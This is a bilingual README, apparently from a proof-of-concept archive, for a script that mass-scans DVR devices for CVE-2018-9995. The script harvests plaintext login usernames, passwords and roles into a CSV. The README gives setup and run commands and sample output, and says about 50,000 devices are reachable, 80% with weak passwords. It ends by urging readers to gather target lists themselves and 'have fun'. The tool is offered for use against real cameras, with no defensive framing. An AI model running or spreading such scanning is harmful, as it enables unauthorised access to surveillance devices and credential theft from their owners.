来源

关联漏洞

描述

CVE-2018-9995_Batch_scanning_exp

介绍

# CVE-2018-9995_Batch_scanning_exp（last 2018-8-9）
针对CVE-2018-9995漏洞的dvr批量扫描脚本

##[CVE-2018-9995原利用脚本(Original code)](https://github.com/ezelf/CVE-2018-9995_dvr_credentials)

##环境准备(Environmental preparation)

python3、ubuntu

```markdown
user@ubuntu:~$ sudo pip3 install grequests
user@ubuntu:~$ sudo pip3 install tableprint
```

##使用方式（usage mode）

将待扫描设备以ip:port形式存入csv文件第一列

The equipment to be scanned is stored in "ip:port" form in the first column of CSV file.

```python
csv_file = csv.reader(open('66b2f74b75457f73347f6a840bebc339.csv','r'))
```

更改上述设备列表文件目录为当前使用目录

Change the list of device list files to the current directory.

```markdown
user@ubuntu:~$ sudo python3 CVE-2018-9995_Batch_scanning_exp.py
```

运行程序

run

```markdown
-----------------------------------501-------------------------------------------------------------

-----------------------------------501-------------------------------------------------------------

-----------------------------------501-------------------------------------------------------------

-----------------------------------NO.1-------------------------------------------------------------


 [+] Users List:	1

 [+] Users List:	1

 [+] Users List:	1

 [+] Users List:	1

 [+] Users List:	1

 [+] Users List:	1

 [+] Users List:	2

 [+] Users List:	1

```

每501个ip输出一次，NO表示轮数，"[+] Users List:"表示成功利用漏洞的设备所包含的用户数

Every 501 IP output is once, "NO" indicates the number of rounds, and "[+] Users List:" indicates the number of users contained in the device that successfully exploited the vulnerability.

输出为pass.csv的csv文件

output pass.csv

```markdown
--------+-----+----+-------+----.......
ip:port |uid1 |pwd1 |role1 |uid2.......
--------+-----+----+-------+----.......
        |     |    |       |    .......
        |     |    |       |    .......
```

##在原程序上的改进(Improvement on the original program)
```markdown
1. 解决了部分设备401错误无法返回信息的问题(Solved the problem that part of the equipment 401 error can not return information.)
2. 解决了部分设备返回json格式不正确问题(The problem of incorrect JSON format for some devices is solved.)
3. 采用异步http请求，极大提高了扫描效率(Using asynchronous HTTP request greatly improves scanning efficiency.)
```

##已知情况说明(letter of presentation)
```markdown
1. 从各大web设备搜索引擎查询的结果上看本次漏洞设计的设备约有50000台，目前凡是有连接响应的设备均可利用该漏洞获取登录账户明文信息。

1.There are about 50000 devices designed for this vulnerability from the results of the search engine query for web equipment. At present, any device with connection response can take advantage of the vulnerability to obtain information on the login account.

2. 墙内扫描仅有6000多台设备有响应

2.There are only more than 6000 devices in response to the scan in china

3. 漏洞利用危害没有预期的那么严重，仅仅是视屏流获取权限，进一步对设备系统的控制权的获取还有待研究

3.The harm of vulnerability is not as serious as expected. It is only the right of access to the screen. Further access to control of the device system remains to be studied.

4. 弱口令真的多，扫描结果的80%均采用了弱口令。

4.There are many weak passwords, and 80% of the scan results use weak passwords.
```
漏洞设备列表就各凭本事了，多想想还是很容易获取的，玩的开心！XD
have fun！ XD

文件快照

 [4.0K]  /data/pocs/f7fc4d07718acaf7556239a1b192f36935faf619
├── [ 36K]  CVE-2018-9995_Batch_scanning_exp.py
└── [3.6K]  README.md

0 directories, 2 files

备注